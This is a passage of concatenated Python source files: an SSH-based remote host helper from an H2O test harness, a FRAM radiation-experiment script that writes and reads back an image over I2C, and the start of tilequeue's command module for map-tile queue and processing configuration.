The list should be complete, as long as created by build_cloud(create_json=True) or
build_cloud_with_hosts(create_json=True)
Obviously, no psutil or paramiko work done here.
'''
def __init__(self, nodeState):
for k, v in nodeState.iteritems():
verboseprint("init:", k, v)
# hack because it looks like the json is currently created with "None" for values of None
# rather than worrying about that, just translate "None" to None here. "None" shouldn't exist
# for any other reason.
if v == "None":
v = None
elif v == "false":
v = False
elif v == "true":
v = True
# leave "null" as-is (string) for now?
setattr(self, k, v) # achieves self.k = v
## print "Cloned", len(nodeState), "things for a h2o node"
def is_alive(self):
verboseprint("Doing is_alive check for ExternalH2O")
try:
self.get_cloud()
return True
except:
return False
# no terminate_self_only method
def terminate_self_only(self):
raise Exception("terminate_self_only() not supported for ExternalH2O")
def terminate(self):
self.shutdown_all()
#*****************************************************************
class RemoteHost(object):
def upload_file(self, f, progress=None):
# FIX! we won't find it here if it's hdfs://172.16.2.151/ file
f = find_file(f)
if f not in self.uploaded:
start = time.time()
import md5
m = md5.new()
m.update(open(f).read())
m.update(getpass.getuser())
dest = '/tmp/' + m.hexdigest() + "-" + os.path.basename(f)
# sigh. we rm/create sandbox in build_cloud now
# (because nosetests doesn't exec h2o_main and we
# don't want to code "clean_sandbox()" in all the tests.
# So: we don't have a sandbox here, or if we do, we're going to delete it.
# Just don't log anything until build_cloud()? that should be okay?
# we were just logging this upload message..not needed.
# log('Uploading to %s: %s -> %s' % (self.http_addr, f, dest))
sftp = self.ssh.open_sftp()
# check if file exists on remote side
# does paramiko have issues with big files? (>1GB, or 650MB?). maybe we don't care.
# This would arise (as mentioned in the source, line no 667,
# http://www.lag.net/paramiko/docs/paramiko.sftp_client-pysrc.html) when there is
# any error reading the packet or when there is EOFError
# but I'm getting sftp close here randomly at sm.
# http://stackoverflow.com/questions/22708942/python-paramiko-module-error-with-callback
# http://stackoverflow.com/questions/15010540/paramiko-sftp-server-connection-dropped
# http://stackoverflow.com/questions/12322210/handling-paramiko-sshexception-server-connection-dropped
try:
# note we don't do a md5 compare. so if a corrupted file was uploaded we won't re-upload
# until we do another build.
sftp.stat(dest)
print "{0} Skipping upload of file {1}. File {2} exists on remote side!".format(self, f, dest)
except IOError, e:
# if self.channel.closed or self.channel.exit_status_ready():
# raise Exception("something bad happened to our %s being used for sftp. keepalive? %s %s" % \
# (self, self.channel.closed, self.channel.exit_status_ready()))
if e.errno == errno.ENOENT: # no such file or directory
verboseprint("{0} uploading file {1}".format(self, f))
sftp.put(f, dest, callback=progress)
# if you want to track upload times
### print "\n{0:.3f} seconds".format(time.time() - start)
elif e.errno == errno.EEXIST: # File Exists
pass
else:
print "Got unexpected errno: %s on paramiko sftp." % e.errno
print "Lookup here: https://docs.python.org/2/library/errno.html"
# throw the exception again, if not what we expected
exc_info = sys.exc_info()
raise exc_info[1], None, exc_info[2]
finally:
sftp.close()
self.uploaded[f] = dest
sys.stdout.flush()
return self.uploaded[f]
def record_file(self, f, dest):
'''Record a file as having been uploaded by external means'''
self.uploaded[f] = dest
def run_cmd(self, cmd):
log('Running `%s` on %s' % (cmd, self))
(stdin, stdout, stderr) = self.ssh.exec_command(cmd)
stdin.close()
sys.stdout.write(stdout.read())
sys.stdout.flush()
stdout.close()
sys.stderr.write(stderr.read())
sys.stderr.flush()
stderr.close()
def push_file_to_remotes(self, f, hosts):
dest = self.uploaded[f]
for h in hosts:
if h == self: continue
self.run_cmd('scp %s %s@%s:%s' % (dest, h.username, h.h2o_addr, dest))
h.record_file(f, dest)
def __init__(self, addr, username=None, password=None, **kwargs):
import paramiko
# To debug paramiko you can use the following code:
#paramiko.util.log_to_file('/tmp/paramiko.log')
#paramiko.common.logging.basicConfig(level=paramiko.common.DEBUG)
# kbn. trying 9/23/13. Never specify -ip on java command line for multi-node
# but self.h2o_addr is used elsewhere. so look at self.remoteH2O to disable in get_args()
# by definition, this must be the publicly visible addrs, otherwise we can't ssh or browse!
self.h2o_addr = addr
self.http_addr = addr
self.username = username # this works, but it's host state
self.ssh = paramiko.SSHClient()
# don't require keys. If no password, assume passwordless setup was done
policy = paramiko.AutoAddPolicy()
self.ssh.set_missing_host_key_policy(policy)
self.ssh.load_system_host_keys()
if password is None:
self.ssh.connect(self.h2o_addr, username=username, **kwargs)
else:
self.ssh.connect(self.h2o_addr, username=username, password=password, **kwargs)
# keep connection - send keepalive packet evety 5minutes
self.ssh.get_transport().set_keepalive(300)
self.uploaded = {}
def remote_h2o(self, *args, **kwargs):
return RemoteH2O(self, self.h2o_addr, *args, **kwargs)
def open_channel(self):
ch = self.ssh.get_transport().open_session()
ch.get_pty() # force the process to die without the connection
return ch
def __str__(self):
return 'ssh://%s@%s' % (self.username, self.h2o_addr)
|
fram.py | '''
This file controls the secondary (radiation) experiment
Contributors:
Jillian Frimml
Skyler Puckett
Konstantin Zaremski
'''
# Import modules
from time import sleep
import time
import logging
import os
import multiprocessing as multiprocessing
from adafruit_extended_bus import ExtendedI2C as I2C
import adafruit_fram
# Configuration
FRAM_COOK_DURATION = 0
# Acquire the existing logger
try:
logger = logging.getLogger(__name__)
except:
logger = None
print('Unable to acquire the global logger object, assuming that sensors.py is being run on its own')
# Main FRAM experiment program loop
def main():
# Configure & initialize the FRAM boards
logging.info(f'Initializing FRAM experiment')
# Creating an array of the bytes that make up monalisa.jpg
sourceByteArray = bytearray()
try:
with open('monalisa.jpg', 'rb') as sourceFile:
sourceByteArray = sourceFile.read()
logging.info(f'Finished building array from input file, {str(len(sourceByteArray))} bytes')
except IOError:
logging.critical('Unable to read in source image (monalisa.jpg)')
# Create the output directory if it does not exist yet
os.system('mkdir -p ./data-fram')
# Configure the I2C busses
i2c = {}
# I2C interface A
try:
i2c['bus0'] = I2C(1)
logging.info('I2C interface A ... OK')
except Exception as error:
logging.critical('Failed to enable i2c interface A')
logging.critical(' ' + str(error))
# Set the interface as None to indicate that it is not working
i2c['bus0'] = None
# I2C interface B
try:
i2c['bus1'] = I2C(4)
logging.info('I2C interface B ... OK')
except Exception as error:
logging.critical('Failed to enable i2c interface B')
logging.critical(' ' + str(error))
# Set the interface as None to indicate that it is not working
i2c['bus1'] = None
# I2C interface C
try:
i2c['bus2'] = I2C(5)
logging.info('I2C interface C ... OK')
except Exception as error:
logging.critical('Failed to enable i2c interface C')
logging.critical(' ' + str(error))
# Set the interface as None to indicate that it is not working
i2c['bus2'] = None
# Find all i2c devices on the busses that are connected
if i2c['bus0'] != None: i2c['devices0'] = i2c['bus0'].scan()
if i2c['bus1'] != None: i2c['devices1'] = i2c['bus1'].scan()
if i2c['bus2'] != None: i2c['devices2'] = i2c['bus2'].scan()
# Build an array of board classes dynamically
fram = [None] * 24
# For each i2c bus
for busNo in range(0, 3):
# If the i2c bus was not configured, do nothing and move on to the next bus
if i2c['bus' + str(busNo)] == None: continue
# For each board that should be connected to the i2c bus
for boardNo in range(0, 8):
# Global board no based on the position in the loops eg.
# bus0 contains fram0 thru fram7
# bus1 contains fram8 thru fram16
# bus2 contains fram16 thru fram21
globalBoardNo = boardNo + (8 * busNo)
try:
fram[globalBoardNo] = adafruit_fram.FRAM_I2C(i2c['bus' + str(busNo)], 0x50 + boardNo)
logging.info(f'FRAM{str(globalBoardNo)} size: {str(len(fram[globalBoardNo]))} bytes')
except Exception as error:
fram[globalBoardNo] = None
logging.error(f'FRAM{str(globalBoardNo)} not detected. {error}')
# ** Define all sub methods used throughout experiment tirals
# Write the source image to the provided FRAM board object
def writeBoard(framBoard, framBoardIndex):
try:
framBoard[0:len(sourceByteArray)] = sourceByteArray[0:len(sourceByteArray)]
except Exception as err:
logging.error(f'Failed write to FRAM board {str(framBoardIndex)}. Error: "{str(err)}"')
# Read back the contents of all FRAM boards and write to file
def readBoard(framBoard, boardNo, trialNo):
try:
cooked = bytearray()
for byteIndex in range(0, len(sourceByteArray)):
cooked += framBoard[byteIndex]
resultFile = open(f'./data-fram/data-fram__trial{str(trialNo)}__board{str(boardNo)}__{str(int(time.time()))}.jpg', 'wb')
resultFile.write(cooked)
resultFile.close()
except Exception as err:
logging.error(f'Failed read from FRAM board {str(boardNo)} in experiment trial {str(trialNo)}. Error: "{str(err)}"')
# Write all zeros to the FRAM boards present
# -- this function is no longer used
def eraseBoard(framBoard):
framBoard[0:len(fram)] = [0] * len(fram)
# Create threads for writing source image
# The source image is written to each FRAM board at the power-on of the payload
# Then it is read back throughout the experiment
startWriteTime = time.time()
logger.info(f'Beginning write of source image to FRAM boards at {str(int(startWriteTime))}')
threads = []
for framBoardIndex in range(0, len(fram)):
framBoard = fram[framBoardIndex]
if framBoard != None:
framWriteThread = multiprocessing.Process(target=writeBoard, args=(framBoard,framBoardIndex))
framWriteThread.start()
threads.append(framWriteThread)
# Wait for all threads to close
for thread in threads:
thread.join()
endWriteTime = time.time()
logger.info(f'Finished writing source image to all FRAM boards at {str(int(endWriteTime))} ({str(int(endWriteTime - startWriteTime))}ms. elapsed)')
# Main experiment loop
experimentTrial = 1
while True:
logging.info(f'Beginning FRAM experiment trial no. {str(experimentTrial)}')
# Create threads for reading data
threads = []
i = 0
for framBoard in fram:
if framBoard != None:
thread = multiprocessing.Process(target=readBoard, args=(framBoard, i, experimentTrial))
thread.start()
threads.append(thread)
i += 1
# Wait for all threads to close
for thread in threads:
thread.join()
experimentTrial += 1
if __name__ == '__main__':
main()
|
command.py | from __future__ import absolute_import
from collections import defaultdict
from collections import namedtuple
from contextlib import closing
from itertools import chain
from ModestMaps.Core import Coordinate
from multiprocessing.pool import ThreadPool
from random import randrange
from tilequeue.config import create_query_bounds_pad_fn
from tilequeue.config import make_config_from_argparse
from tilequeue.format import lookup_format_by_extension
from tilequeue.metro_extract import city_bounds
from tilequeue.metro_extract import parse_metro_extract
from tilequeue.process import process
from tilequeue.process import Processor
from tilequeue.query import DBConnectionPool
from tilequeue.query import make_data_fetcher
from tilequeue.queue import make_sqs_queue
from tilequeue.queue import make_visibility_manager
from tilequeue.store import make_store
from tilequeue.tile import coord_children_range
from tilequeue.tile import coord_int_zoom_up
from tilequeue.tile import coord_is_valid
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import create_coord
from tilequeue.tile import deserialize_coord
from tilequeue.tile import metatile_zoom_from_str
from tilequeue.tile import seed_tiles
from tilequeue.tile import serialize_coord
from tilequeue.tile import tile_generator_for_multiple_bounds
from tilequeue.tile import tile_generator_for_range
from tilequeue.tile import tile_generator_for_single_bounds
from tilequeue.tile import zoom_mask
from tilequeue.toi import load_set_from_fp
from tilequeue.toi import save_set_to_fp
from tilequeue.top_tiles import parse_top_tiles
from tilequeue.utils import grouper
from tilequeue.utils import parse_log_file
from tilequeue.utils import time_block
from tilequeue.worker import DataFetch
from tilequeue.worker import ProcessAndFormatData
from tilequeue.worker import QueuePrint
from tilequeue.worker import S3Storage
from tilequeue.worker import TileQueueReader
from tilequeue.worker import TileQueueWriter
from urllib2 import urlopen
from zope.dottedname.resolve import resolve
import argparse
import datetime
import logging
import logging.config
import multiprocessing
import operator
import os
import os.path
import Queue
import signal
import sys
import threading
import time
import traceback
import yaml
def create_coords_generator_from_tiles_file(fp, logger=None):
for line in fp:
line = line.strip()
if not line:
continue
coord = deserialize_coord(line)
if coord is None:
if logger is not None:
logger.warning('Could not parse coordinate from line: ' % line)
continue
yield coord
def lookup_formats(format_extensions):
formats = []
for extension in format_extensions:
format = lookup_format_by_extension(extension)
assert format is not None, 'Unknown extension: %s' % extension
formats.append(format)
return formats
def uniquify_generator(generator):
s = set(generator)
for tile in s:
yield tile
class GetSqsQueueNameForZoom(object):
def __init__(self, zoom_queue_table):
self.zoom_queue_table = zoom_queue_table
def __call__(self, zoom):
assert isinstance(zoom, (int, long))
assert 0 <= zoom <= 20
result = self.zoom_queue_table.get(zoom)
assert result is not None, 'No queue name found for zoom: %d' % zoom
return result
def make_get_queue_name_for_zoom(zoom_queue_map_cfg, queue_names):
zoom_to_queue_name_table = {}
for zoom_range, queue_name in zoom_queue_map_cfg.items():
assert queue_name in queue_names
assert '-' in zoom_range, 'Invalid zoom range: %s' % zoom_range
zoom_fields = zoom_range.split('-')
assert len(zoom_fields) == 2, 'Invalid zoom range: %s' % zoom_range
zoom_start_str, zoom_until_str = zoom_fields
try:
zoom_start = int(zoom_start_str)
zoom_until = int(zoom_until_str)
except (ValueError, KeyError):
assert not 'Invalid zoom range: %s' % zoom_range
assert (0 <= zoom_start <= 20 and
0 <= zoom_until <= 20 and
zoom_start <= zoom_until), \
'Invalid zoom range: %s' % zoom_range
for i in range(zoom_start, zoom_until + 1):
assert i not in zoom_to_queue_name_table, \
'Overlapping zoom range: %s' % zoom_range
zoom_to_queue_name_table[i] = queue_name
result = GetSqsQueueNameForZoom(zoom_to_queue_name_table)
return result
def make_queue_mapper(queue_mapper_yaml, tile_queue_name_map, toi):
queue_mapper_type = queue_mapper_yaml.get('type')
assert queue_mapper_type, 'Missing queue mapper type'
if queue_mapper_type == 'single':
queue_name = queue_mapper_yaml.get('name')
assert queue_name, 'Missing queue name in queue mapper config'
tile_queue = tile_queue_name_map.get(queue_name)
assert tile_queue, 'No queue found in mapping for %s' % queue_name
return make_single_queue_mapper(queue_name, tile_queue)
elif queue_mapper_type == 'multiple':
multi_queue_map_yaml = queue_mapper_yaml.get('multiple')
assert multi_queue_map_yaml, \
'Missing yaml config for multiple queue mapper'
assert isinstance(multi_queue_map_yaml, list), \
'Mulitple queue mapper config should be a list'
return make_multi_queue_group_mapper_from_cfg(
multi_queue_map_yaml, tile_queue_name_map, toi)
else:
assert 0, 'Unknown queue mapper type: %s' % queue_mapper_type
def make_multi_queue_group_mapper_from_cfg(
multi_queue_map_yaml, tile_queue_name_map, toi):
from tilequeue.queue.mapper import ZoomRangeAndZoomGroupQueueMapper
from tilequeue.queue.mapper import ZoomRangeQueueSpec
zoom_range_specs = []
for zoom_range_spec_yaml in multi_queue_map_yaml:
start_zoom = zoom_range_spec_yaml.get('start-zoom')
end_zoom = zoom_range_spec_yaml.get('end-zoom')
if start_zoom is not None and end_zoom is not None:
assert isinstance(start_zoom, int)
assert isinstance(end_zoom, int)
assert start_zoom < end_zoom
else:
start_zoom = None
end_zoom = None
queue_name = zoom_range_spec_yaml['queue-name']
queue = tile_queue_name_map[queue_name]
group_by_zoom = zoom_range_spec_yaml.get('group-by-zoom')
in_toi = zoom_range_spec_yaml.get('in_toi')
assert group_by_zoom is None or isinstance(group_by_zoom, int)
zrs = ZoomRangeQueueSpec(
start_zoom, end_zoom, queue_name, queue, group_by_zoom,
in_toi)
zoom_range_specs.append(zrs)
queue_mapper = ZoomRangeAndZoomGroupQueueMapper(
zoom_range_specs, toi=toi)
return queue_mapper
def make_single_queue_mapper(queue_name, tile_queue):
from tilequeue.queue.mapper import SingleQueueMapper
queue_mapper = SingleQueueMapper(queue_name, tile_queue)
return queue_mapper
def make_message_marshaller(msg_marshall_yaml_cfg):
msg_mar_type = msg_marshall_yaml_cfg.get('type')
assert msg_mar_type, 'Missing message marshall type in config'
if msg_mar_type == 'single':
from tilequeue.queue.message import SingleMessageMarshaller
return SingleMessageMarshaller()
elif msg_mar_type == 'multiple':
from tilequeue.queue.message import CommaSeparatedMarshaller
return CommaSeparatedMarshaller()
else:
assert 0, 'Unknown message marshall type: %s' % msg_mar_type
def make_inflight_manager(inflight_yaml, redis_client=None):
if not inflight_yaml:
from tilequeue.queue.inflight import NoopInFlightManager
return NoopInFlightManager()
inflight_type = inflight_yaml.get('type')
assert inflight_type, 'Missing inflight type config'
if inflight_type == 'redis':
assert redis_client, 'redis client required for redis inflight manager'
inflight_key = 'tilequeue.in-flight'
inflight_redis_cfg = inflight_yaml.get('redis')
if inflight_redis_cfg:
inflight_key = inflight_redis_cfg.get('key') or inflight_key
from tilequeue.queue.inflight import RedisInFlightManager
return RedisInFlightManager(redis_client, inflight_key)
else:
assert 0, 'Unknown inflight type: %s' % inflight_type
def make_visibility_mgr_from_cfg(visibility_yaml):
assert visibility_yaml, 'Missing message-visibility config'
extend_secs = visibility_yaml.get('extend-seconds')
assert extend_secs > 0, \
'Invalid message-visibility extend-seconds'
max_secs = visibility_yaml.get('max-seconds')
assert max_secs is not None, \
'Invalid message-visibility max-seconds'
timeout_secs = visibility_yaml.get('timeout-seconds')
assert timeout_secs is not None, \
'Invalid message-visibility timeout-seconds'
visibility_extend_mgr = make_visibility_manager(
extend_secs, max_secs, timeout_secs)
return visibility_extend_mgr
def make_sqs_queue_from_cfg(name, queue_yaml_cfg, visibility_mgr):
region = queue_yaml_cfg.get('region')
assert region, 'Missing queue sqs region'
tile_queue = make_sqs_queue(name, region, visibility_mgr)
return tile_queue
def make_tile_queue(queue_yaml_cfg, all_cfg, redis_client=None):
# return a tile_queue, name instance, or list of tilequeue, name pairs
# alternatively maybe should force queue implementations to know
# about their names?
if isinstance(queue_yaml_cfg, list):
result = []
for queue_item_cfg in queue_yaml_cfg:
tile_queue, name = make_tile_queue(
queue_item_cfg, all_cfg, redis_client)
result.append((tile_queue, name))
return result
else:
queue_name = queue_yaml_cfg.get('name')
assert queue_name, 'Missing queue name'
queue_type = queue_yaml_cfg.get('type')
assert queue_type, 'Missing queue type'
if queue_type == 'sqs':
sqs_cfg = queue_yaml_cfg.get('sqs')
assert sqs_cfg, 'Missing queue sqs config'
visibility_yaml = all_cfg.get('message-visibility')
visibility_mgr = make_visibility_mgr_from_cfg(visibility_yaml)
tile_queue = make_sqs_queue_from_cfg(queue_name, sqs_cfg,
visibility_mgr)
elif queue_type == 'mem':
from tilequeue.queue import MemoryQueue
tile_queue = MemoryQueue()
elif queue_type == 'file':
from tilequeue.queue import OutputFileQueue
if os.path.exists(queue_name):
assert os.path.isfile(queue_name), \
('Could not create file queue. `./{}` is not a '
'file!'.format(queue_name))
fp = open(queue_name, 'a+')
tile_queue = OutputFileQueue(fp)
elif queue_type == 'stdout':
# only support writing
from tilequeue.queue import OutputFileQueue
tile_queue = OutputFileQueue(sys.stdout)
elif queue_type == 'redis':
assert redis_client, 'redis_client required for redis tile_queue'
from tilequeue.queue import make_redis_queue
tile_queue = make_redis_queue(redis_client, queue_name)
else:
raise ValueError('Unknown queue type: %s' % queue_type)
return tile_queue, queue_name
def make_msg_tracker(msg_tracker_yaml, logger):
if not msg_tracker_yaml:
from tilequeue.queue.message import SingleMessagePerCoordTracker
return SingleMessagePerCoordTracker()
else:
msg_tracker_type = msg_tracker_yaml.get('type')
assert msg_tracker_type, 'Missing message tracker type'
if msg_tracker_type == 'single':
from tilequeue.queue.message import SingleMessagePerCoordTracker
return SingleMessagePerCoordTracker()
elif msg_tracker_type == 'multiple':
from tilequeue.queue.message import MultipleMessagesPerCoordTracker
from tilequeue.log import MultipleMessagesTrackerLogger
msg_tracker_logger = MultipleMessagesTrackerLogger(logger)
return MultipleMessagesPerCoordTracker(msg_tracker_logger)
else:
assert 0, 'Unknown message tracker type: %s' % msg_tracker_type
def make_toi_helper(cfg):
if cfg.toi_store_type == 's3':
from tilequeue.toi import S3TilesOfInterestSet
return S3TilesOfInterestSet(
cfg.toi_store_s3_bucket,
cfg.toi_store_s3_key,
)
elif cfg.toi_store_type == 'file':
from tilequeue.toi import FileTilesOfInterestSet
return FileTilesOfInterestSet(
cfg.toi_store_file_name,
)
def make_redis_client(cfg):
from redis import StrictRedis
redis_client = StrictRedis(cfg.redis_host, cfg.redis_port, cfg.redis_db)
return redis_client
def make_logger(cfg, logger_name, loglevel=logging.INFO):
if getattr(cfg, 'logconfig') is not None:
logging.config.fileConfig(cfg.logconfig)
logger = logging.getLogger(logger_name)
logger.setLevel(loglevel)
return logger
def make_seed_tile_generator(cfg):
if cfg.seed_all_zoom_start is not None:
assert cfg.seed_all_zoom_until is not None
all_tiles = seed_tiles(cfg.seed_all_zoom_start,
cfg.seed_all_zoom_until)
else:
all_tiles = ()
if cfg.seed_metro_extract_url:
assert cfg.seed_metro_extract_zoom_start is not None
assert cfg.seed_metro_extract_zoom_until is not None
with closing(urlopen(cfg.seed_metro_extract_url)) as fp:
# will raise a MetroExtractParseError on failure
metro_extracts = parse_metro_extract(fp)
city_filter = cfg.seed_metro_extract_cities
if city_filter is not None:
metro_extracts = [
city for city in metro_extracts if city.city in city_filter]
multiple_bounds = city_bounds(metro_extracts)
metro_extract_tiles = tile_generator_for_multiple_bounds(
multiple_bounds, cfg.seed_metro_extract_zoom_start,
cfg.seed_metro_extract_zoom_until)
else:
metro_extract_tiles = ()
if cfg.seed_top_tiles_url:
assert cfg.seed_top_tiles_zoom_start is not None
assert cfg.seed_top_tiles_zoom_until is not None
with closing(urlopen(cfg.seed_top_tiles_url)) as fp:
top_tiles = parse_top_tiles(
fp, cfg.seed_top_tiles_zoom_start,
cfg.seed_top_tiles_zoom_until)
else:
top_tiles = ()
if cfg.seed_custom_bboxes:
assert cfg.seed_custom_zoom_start is not None
assert cfg.seed_custom_zoom_until is not None
custom_tiles = tile_generator_for_multiple_bounds(
cfg.seed_custom_bboxes, cfg.seed_custom_zoom_start,
cfg.seed_custom_zoom_until)
else:
custom_tiles = ()
combined_tiles = chain(
all_tiles, metro_extract_tiles, top_tiles, custom_tiles)
if cfg.seed_unique:
tile_generator = uniquify_generator(combined_tiles)
else:
tile_generator = combined_tiles
return tile_generator
def _make_store(cfg,
s3_role_arn=None,
s3_role_session_duration_s=None,
logger=None):
store_cfg = cfg.yml.get('store')
assert store_cfg, "Store was not configured, but is necessary."
if logger is None:
logger = make_logger(cfg, 'process')
store = make_store(store_cfg,
s3_role_arn=s3_role_arn,
s3_role_session_duration_s=s3_role_session_duration_s,
logger=logger)
return store
def explode_and_intersect(coord_ints, tiles_of_interest, until=0):
next_coord_ints = coord_ints
coord_ints_at_parent_zoom = set()
total_coord_ints = []
# to capture metrics
total = 0
hits = 0
misses = 0
while True:
for coord_int in next_coord_ints:
total += 1
if coord_int in tiles_of_interest:
hits += 1
total_coord_ints.append(coord_int)
else:
misses += 1
zoom = zoom_mask & coord_int
if zoom > until:
parent_coord_int = coord_int_zoom_up(coord_int)
coord_ints_at_parent_zoom.add(parent_coord_int)
if not coord_ints_at_parent_zoom:
break
next_coord_ints = coord_ints_at_parent_zoom
coord_ints_at_parent_zoom = set()
metrics = dict(
total=total,
hits=hits,
misses=misses,
n_toi=len(tiles_of_interest),
)
return total_coord_ints, metrics
def coord_ints_from_paths(paths):
coord_set = set()
path_counts = []
for path in paths:
path_count = 0
with open(path) as fp:
coords = create_coords_generator_from_tiles_file(fp)
for coord in coords:
coord_int = coord_marshall_int(coord)
coord_set.add(coord_int)
path_count += 1
path_counts.append((path, path_count))
result = dict(
coord_set=coord_set,
path_counts=path_counts,
)
return result
def _parse_postprocess_resources(post_process_item, cfg_path):
resources_cfg = post_process_item.get('resources', {})
resources = {}
for resource_name, resource_cfg in resources_cfg.iteritems():
resource_type = resource_cfg.get('type')
init_fn_name = resource_cfg.get('init_fn')
assert resource_type, 'Missing type in resource %r' \
% resource_name
assert init_fn_name, 'Missing init function name in ' \
'resource %r' % resource_name
try:
fn = resolve(init_fn_name)
except Exception:
raise Exception('Unable to init resource %r with function %r due '
'to %s' % (resource_name, init_fn_name,
"".join(traceback.format_exception(
*sys.exc_info()))))
if resource_type == 'file':
path = resource_cfg.get('path')
assert path, 'Resource %r of type file is missing the ' \
'path parameter' % resource_name
with open(os.path.join(cfg_path, path), 'r') as fh:
resources[resource_name] = fn(fh)
else:
raise Exception('Resource type %r is not supported'
% resource_type)
return resources
SourcesConfig = namedtuple('SourcesConfig', 'sources queries_generator')
def parse_layer_data(query_cfg, buffer_cfg, cfg_path):
all_layer_names = query_cfg['all']
layers_config = query_cfg['layers']
post_process_config = query_cfg.get('post_process', [])
layer_data = []
all_layer_data = []
post_process_data = []
for layer_name, layer_config in layers_config.items():
area_threshold = int(layer_config.get('area-inclusion-threshold', 1))
layer_datum = dict(
name=layer_name,
is_clipped=layer_config.get('clip', True),
clip_factor=layer_config.get('clip_factor', 1.0),
geometry_types=layer_config['geometry_types'],
transform_fn_names=layer_config.get('transform', []),
sort_fn_name=layer_config.get('sort'),
simplify_before_intersect=layer_config.get(
'simplify_before_intersect', False),
simplify_start=layer_config.get('simplify_start', 0),
area_threshold=area_threshold,
query_bounds_pad_fn=create_query_bounds_pad_fn(
buffer_cfg, layer_name),
tolerance=float(layer_config.get('tolerance', 1.0)),
)
layer_data.append(layer_datum)
if layer_name in all_layer_names:
all_layer_data.append(layer_datum)
for post_process_item in post_process_config:
fn_name = post_process_item.get('fn')
assert fn_name, 'Missing post process config fn'
params = post_process_item.get('params')
if params is None:
params = {}
resources = _parse_postprocess_resources(post_process_item, cfg_path)
post_process_data.append(dict(
fn_name=fn_name,
params=dict(params),
resources=resources))
return all_layer_data, layer_data, post_process_data
def make_output_calc_mapping(process_yaml_cfg):
output_calc_mapping = {}
if process_yaml_cfg['type'] == 'parse':
parse_cfg = process_yaml_cfg['parse']
yaml_path = parse_cfg['path']
assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
from vectordatasource.meta.python import make_function_name_props
from vectordatasource.meta.python import output_kind
from vectordatasource.meta.python import parse_layers
layer_parse_result = parse_layers(
yaml_path, output_kind, make_function_name_props)
for layer_datum in layer_parse_result.layer_data:
output_calc_mapping[layer_datum.layer] = layer_datum.fn
elif process_yaml_cfg['type'] == 'callable':
callable_cfg = process_yaml_cfg['callable']
dotted_name = callable_cfg['dotted-name']
fn = resolve(dotted_name)
output_calc_mapping = fn(*callable_cfg['args'])
else:
raise ValueError('Invalid process yaml config: %s' % process_yaml_cfg)
return output_calc_mapping
def make_min_zoom_calc_mapping(process_yaml_cfg):
# can't handle "callable" type - how do we get the min zoom fn?
assert process_yaml_cfg['type'] == 'parse'
min_zoom_calc_mapping = {}
parse_cfg = process_yaml_cfg['parse']
yaml_path = parse_cfg['path']
assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
from vectordatasource.meta.python import make_function_name_min_zoom
from vectordatasource.meta.python import output_min_zoom
from vectordatasource.meta.python import parse_layers
layer_parse_result = parse_layers(
yaml_path, output_min_zoom, make_function_name_min_zoom)
for layer_datum in layer_parse_result.layer_data:
min_zoom_calc_mapping[layer_datum.layer] = layer_datum.fn
return min_zoom_calc_mapping
def tilequeue_process(cfg, peripherals):
from tilequeue.log import JsonTileProcessingLogger
logger = make_logger(cfg, 'process')
tile_proc_logger = JsonTileProcessingLogger(logger)
tile_proc_logger.lifecycle('tilequeue processing started')
assert os.path.exists(cfg.query_cfg), \
'Invalid query config path'
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
formats = lookup_formats(cfg.output_formats)
store = _make_store(cfg)
assert cfg.postgresql_conn_info, 'Missing postgresql connection info'
from shapely import speedups
if speedups.available:
speedups.enable()
tile_proc_logger.lifecycle('Shapely speedups enabled')
else:
tile_proc_logger.lifecycle(
'Shapely speedups not enabled, they were not available')
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
n_cpu = multiprocessing.cpu_count()
n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
if not n_simultaneous_query_sets:
# default to number of databases configured
n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
assert n_simultaneous_query_sets > 0
# reduce queue size when we're rendering metatiles to try and avoid the
# geometry waiting to be processed from taking up all the RAM!
size_sqr = (cfg.metatile_size or 1)**2
default_queue_buffer_size = max(1, 16 / size_sqr)
sql_queue_buffer_size = cfg.sql_queue_buffer_size or \
default_queue_buffer_size
proc_queue_buffer_size = cfg.proc_queue_buffer_size or \
default_queue_buffer_size
s3_queue_buffer_size = cfg.s3_queue_buffer_size or \
default_queue_buffer_size
n_layers = len(all_layer_data)
n_formats = len(formats)
n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
if not n_simultaneous_s3_storage:
n_simultaneous_s3_storage = max(n_cpu / 2, 1)
assert n_simultaneous_s3_storage > 0
# thread pool used for queries and uploading to s3
n_total_needed_query = n_layers * n_simultaneous_query_sets
n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
n_total_needed = n_total_needed_query + n_total_needed_s3
n_max_io_workers = 50
n_io_workers = min(n_total_needed, n_max_io_workers)
io_pool = ThreadPool(n_io_workers)
feature_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
# create all queues used to manage pipeline
# holds coordinate messages from tile queue reader
# TODO can move this hardcoded value to configuration
# having a little less than the value is beneficial
# ie prefer to read on-demand from queue rather than hold messages
# in waiting while others are processed, can become stale faster
tile_input_queue = Queue.Queue(10)
# holds raw sql results - no filtering or processing done on them
sql_data_fetch_queue = multiprocessing.Queue(sql_queue_buffer_size)
# holds data after it has been filtered and processed
# this is where the cpu intensive part of the operation will happen
# the results will be data that is formatted for each necessary format
processor_queue = multiprocessing.Queue(proc_queue_buffer_size)
# holds data after it has been sent to s3
s3_store_queue = Queue.Queue(s3_queue_buffer_size)
# create worker threads/processes
thread_tile_queue_reader_stop = threading.Event()
queue_mapper = peripherals.queue_mapper
msg_marshaller = peripherals.msg_marshaller
msg_tracker_yaml = cfg.yml.get('message-tracker')
msg_tracker = make_msg_tracker(msg_tracker_yaml, logger)
from tilequeue.stats import TileProcessingStatsHandler
stats_handler = TileProcessingStatsHandler(peripherals.stats)
tile_queue_reader = TileQueueReader(
queue_mapper, msg_marshaller, msg_tracker, tile_input_queue,
tile_proc_logger, stats_handler, thread_tile_queue_reader_stop,
cfg.max_zoom, cfg.group_by_zoom)
data_fetch = DataFetch(
feature_fetcher, tile_input_queue, sql_data_fetch_queue, io_pool,
tile_proc_logger, stats_handler, cfg.metatile_zoom, cfg.max_zoom,
